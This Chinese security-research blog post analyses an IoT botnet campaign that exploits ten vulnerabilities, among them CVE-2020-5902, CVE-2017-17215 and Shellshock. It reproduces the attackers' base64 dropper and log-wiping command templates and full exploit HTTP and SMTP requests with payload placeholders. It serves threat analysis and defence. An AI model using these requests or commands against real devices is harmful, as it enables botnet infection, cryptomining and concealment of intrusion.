【格物猎踪】压缩？base64？10个漏洞？攻击物联网设备愈发隐蔽！

执行摘要

近期，我们在排查绿盟威胁捕获系统相关日志的过程中发现了一种针对物联网设备和structs2的新型攻击手法，攻击者通过压缩样本、base64编码传输等方式隐藏其样本和执行的指令。自2020年12月17日起，从物联网设备到structs2，攻击者已利用10个漏洞投递相关样本。

截至成稿，我们发现利用该攻击手法的漏洞探测行为尚未停止，虽然没有出现爆发的情况，但也应引起各方注意，提前做好预防措施。

一、攻击手法分析

我们发现攻击者已经使用了10个漏洞传播样本，感染僵尸主机。虽然使用的漏洞不同，但投递样本的方式类似，针对物联网设备投递样本的payload结构如下所示（encoded_zipfile表示base64编码后的内容）：

echo encoded_zipfile | base64 -d >virus.zip;unzip -o virus.zip;chmod 775 virus.sh;sh  virus.sh & rm -rf virus.sh;rm -rf/var/log;history -c;history -w

即，不通过wget、curl等方式下载样本，直接通过echo命令打印base64编码过的zip文件，并通过管道运算符连接base64解码的命令，将解码后的结果输出到本地的文件中。之后解压zip文件，修改文件权限，执行样本，清除磁盘中的样本和相关日志，销毁证据。

针对structs2投递样本时，payload结构入下所示（encoded_zipfile表示base64编码后的内容）：

echo encoded_zipfile | base64 -d> cat.gz.zip;unzip -f -P "1234567890" cat.gz.zip; gzip -fd *;chmod 755 cat; cat&rm-rf cat; rm .bash_history; rm -rf /var/log; history -cw

整体攻击手法和针对物联网设备投递样本基本一样，区别是：1）将样本压缩了两次，且使用了密码。2）样本从shell变为二进制，且命名为cat，混淆执行样本后的进程。

二、相关漏洞

我们发现攻击者用于投递样本的漏洞达到10种，包括物联网设备的漏洞以及Apache Struts 2的相关漏洞，本文就其中物联网相关漏洞的做相关说明。

2.1 CVE-2020-5902

F5 BIG-IP 是美国 F5 公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。2020年7月初，有安全研究人员公开披露F5 BIG-IP产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞，并给出测试PoC，攻击者通过向漏洞页面发送特制的请求包，可以造成任意Java 代码执行，进而控制F5 BIG-IP 的全部功能，包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等，该漏洞影响控制面板，不影响数据面板。

CVE-2020-5902涉及文件读取、命令执行等，据公开EXP描述，命令执行分为三步：

1) 创建执行命令的模式，将list设置为bash的别名

tmshCmd.jsp?command=create+cli+alias+private+list+command+bash

2) 向创建的文件中写入要执行的命令

fileSave.jsp?fileName=/tmp/cmd&content=id

3) 利用前面设置的list来执行文件中的命令

tmshCmd.jsp?command=list+/tmp/cmd

但本次我们捕获到的攻击，攻击者直接将攻击的命令写入了crontab文件（其中payload为攻击者的恶意载荷，如第一节所示）：

GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/etc/crontab&content=%5Cn%5Cn%5Cn%5Cn%201%20*%20*%20*%20*%20payload

不同于公开EXP的利用手法，说明攻击者对漏洞具有一定的分析能力，对武器库有一定的开发能力。

2.2CVE-2014-8361

该漏洞存在于Realtek SDK中的miniigd SOAP服务中，该漏洞允许攻击者通过远程执行任意代码。触发RCE的请求路径为：/picsdesc.xml，请求的方法为POST，恶意载荷位于body中，目前，漏洞的利用方式与公开EXP一致，如下所示（其中payload为攻击者的恶意载荷，如第一节所示）：

POST /picsdesc.xml HTTP/1.1
User-Agent: Chrome/85.0.4183.121
Accept: */*
Accept-Encoding: identity
Host: xxx.xxx.xxx.xxx
Connection: keep-alive
Content-Type: text/xml
Content-Length: 18319
SOAPAction:urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
<?xmlversion="1.0"?><s:Envelopexmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMappingxmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>30006</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>30006</NewInternalPort><NewInternalClient>’payload’</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration><u:AddPortMapping></s:Body></s:Envelope>

2.3CVE-2020-10987

腾达的AC15 AC1900路由器，在15.03.05.19版本中允许攻击者远程执行命令，目前，漏洞的利用方式与公开EXP一致，触发漏洞的请求路径为：/goform/setUsbUnload，请求方法为：POST，恶意负载位于body中，如下所示（其中payload为攻击者的恶意载荷，如第一节所示）：

POST /goform/setUsbUnload HTTP/1.1
User-Agent: Chrome/85.0.4183.121
Accept: */*
Accept-Encoding: identity
Host: xxx.xxx.xxx.xxx
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 17749
X-Requested-With: XMLHttpRequest
Cookie:password=40203abe6e81ed98cbc97cdd6ec4f144f1qtqb
Referer: http://'129.28.197.213'samba.html?random=0.035894671968571656&
deViceName=; payload

2.4 CVE-2017-6334

NETGEAR DGN2200中的dnslookup.cgi文件，在10.0.0.50版本中允许攻击者通过远程发送POST请求远程执行系统命令，目前，漏洞的利用方式与公开EXP一致，触发漏洞的请求路径为：/dnslookup.cgi，请求方法为：POST，恶意负载位于body中，如下所示（其中payload为攻击者的恶意载荷，如第一节所示）：

POST /dnslookup.cgi HTTP/1.1
Host: xxx.xxx.xxx.xxx
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
User-Agent: curl/7.72.0
Accept: */*
Content-Length: 17777
Content-Type: application/x-www-form-urlencoded
host_name=www.google.com;payload

2.5EDB-ID:40500

AVTECH成立于1996年，是世界上领先的CCTV制造商之一，该漏洞影响任何版本的Avtech设备（包括IP摄像头、NVR、DVR）。互联网公开EXP中，触发漏洞的请求路径为：/dnslookup.cgi，请求方法为：GET，恶意负载位于请求的参数中，但我们发现，攻击者对该漏洞的利用于公开EXP不同，其恶意负载在位于请求的Body中，如下所示（其中payload为攻击者的恶意载荷，如第一节所示）：

GET /cgi-bin/nobody/Search.cgi HTTP/1.1
User-Agent: Chrome/85.0.4183.121
Accept: */*
Accept-Encoding: identity
Host: 129.28.176.79
Connection: Keep-Alive
action: cgi_query
ip: google.com
port: 80
queryb64str: Lw==
username:admin%20;XmlAp%20r%20Account.User1.Password%3E$(payload)
password: admin

2.6CVE-2017-17215

该漏洞影响华为HG532设备，允许攻击者远程执行命令。经过认证的攻击者可以向37215端口发送恶意的数据包触发攻击。目前，漏洞的利用方式与公开EXP一致，触发漏洞的请求路径为：/ctrlt/DeviceUpgrade_1，请求方法为：POST，恶意负载位于body中，如下所示（其中payload为攻击者的恶意载荷，如第一节所示）：

POST/ctrlt/DeviceUpgrade_1 HTTP/1.1
User-Agent:Chrome/85.0.4183.121
Accept: */*
Accept-Encoding:identity
Host:129.28.176.79
Connection:Keep-Alive
Content-Type:application/x-www-form-urlencoded
Content-Length:18111
<?xmlversion="1.0" ?>\n   <s:Envelopexmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">\n    <s:Body><u:Upgradexmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">\n    <NewStatusURL>$( payload)</NewStatusURL>\n<NewDownloadURL>$(echoHUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>

2.7Shellshock

Shellshock，又称Bashdoor，是在Unix中广泛使用的Bash shell中的一个安全漏洞，首次于2014年9月24日公开。许多互联网守护进程，如网页服务器，使用bash来处理某些命令，从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。

本次我们捕获到的利用Shellshock的攻击涉及两类：Web服务和SMTP服务。其中，针对Web服务触发Shellshock的攻击，请求路径为：/cgi-bin/luci，请求的方法为GET，触发EXP的路径位于User Agent中，如下所示（其中payload为攻击者的恶意载荷，如第一节所示）：

GET /cgi-bin/luci HTTP/1.1
User-Agent: () { :;};payload

针对SMTP服务触发Shellshock的攻击，如下所示（其中payload为攻击者的恶意载荷，如第一节所示）：

MAILFROM:<() {{ :; }}; payload>\r\n
RCPTTO:<root>\r\n
DATA\r\n

三、样本分析

本次攻击，我们捕获到的样本分为两种，一种针对物联网设备，另一种针对Apache Struts 2。

3.1针对物联网设备的样本

物联网设备投递的样本为shell，关键部分代码如图所示：

图 3.1 shell样本

该样本运行后，会在僵尸主机上创建root后门账户，开启SSH远程登录，清除防火墙，值得注意的时，该样本会通过smtp的方式，向自己的邮箱发送邮件，通知已感染新的僵尸主机。目前，攻击者发送邮件的账号（硬编码）仍未修改密码，可以正常使用，但我们发现，攻击者已经清除了相关记录。

图 3.2 攻击者邮箱

另外，该样本尝试从github以及pastebin下载其他样本，但其github仓库已删除，从样本名称猜测，攻击者尝试开启设备的3389端口。

3.2针对Apache Struts 2的样本

针对Apache Struts 2的样本使用多层xor加密，解密后与针对物联网设备的样本类似，为bash木马，主要功能为下载执行指定url中的文件(目前url涉及的github项目已经关闭)，一般用于下载挖矿程序xmrig，矿池地址：xmr.2miners.com:2222。

四、IoC

部分样本源文件名与SHA256

相关漏洞

攻击者邮箱

攻击源

往期回顾

- 【格物猎踪】突发-新型Gafgyt僵尸网络变种感染Seowon路由器

- 【格物猎踪】“磨刀霍霍”—ASUS DSL-N12E_C1 RCE漏洞正被探测

- 【格物猎踪】“老树新花”——新武器已更新，目标TVT DVR

关于格物实验室

格物实验室专注于工业互联网、物联网和车联网三大业务场景的安全研究。 致力于以场景为导向，智能设备为中心的漏洞挖掘、研究与安全分析，关注物联网资产、脆弱性、漏洞、威胁分析，构建了完备的物联网暴露资产与威胁运营体系。目前已发布多篇研究报告，包括《物联网安全白皮书》、《物联网安全年报2017》、《物联网安全年报2018》、《物联网安全年报2019》、 《物联网安全年报2020》 、《国内物联网资产的暴露情况分析》、《智能设备安全分析手册》等。与产品团队联合推出绿盟物联网安全风控平台，定位运营商行业物联网卡的风险管控；推出固件安全检测平台，以便快速发现设备中可能存在的漏洞，以避免因弱口令、溢出等漏洞引起设备控制权限的泄露。

关于伏影实验室

伏影实验室专注于安全威胁与监测技术研究。 研究目标包括僵尸网络威胁，DDoS对抗，WEB对抗，流行服务系统脆弱利用威胁、身份认证威胁，数字资产威胁，黑色产业威胁及新兴威胁。通过掌控现网威胁来识别风险，缓解威胁伤害，为威胁对抗提供决策支撑。

伏影实验室威胁捕获系统

网络安全发展至今特别是随着威胁情报的兴起和虚拟化技术的不断发展，欺骗技术也越来越受到各方的关注。欺骗技术就是威胁捕获系统关键技术之一。它的高保真、高质量、鲜活性等特征，使之成为研究敌人的重要手段，同时实时捕获一手威胁时间不再具有滞后性，非常适合威胁情报的时效性需求。

绿盟伏影实验室于2017年中旬运营了一套威胁捕获系统，发展至今已逐步成熟，感知节点遍布世界五大洲，覆盖了20多个国家，覆盖常见服务、IOT服务，工控服务等。形成了以全端口模拟为基础，智能交互服务为辅的混合型感知架构，每天从互联网中捕获大量的鲜活威胁情报，实时感知威胁。

作者： 魏佩儒 责任编辑：王星凯

本公众号原创文章仅代表作者观点，不代表绿盟科技立场。所有原创内容版权均属绿盟科技研究通讯。未经授权，严禁任何媒体以及微信公众号复制、转载、摘编或以其他方式使用，转载须注明来自绿盟科技研究通讯并附上本文链接。

关于我们

绿盟科技研究通讯由绿盟科技创新中心负责运营，绿盟科技创新中心是绿盟科技的前沿技术研究部门。包括云安全实验室、安全大数据分析实验室和物联网安全实验室。团队成员由来自清华、北大、哈工大、中科院、北邮等多所重点院校的博士和硕士组成。

绿盟科技创新中心作为“中关村科技园区海淀园博士后工作站分站”的重要培养单位之一，与清华大学进行博士后联合培养，科研成果已涵盖各类国家课题项目、国家专利、国家标准、高水平学术论文、出版专业书籍等。

我们持续探索信息安全领域的前沿学术方向，从实践出发，结合公司资源和先进技术，实现概念级的原型系统，进而交付产品线孵化产品并创造巨大的经济价值。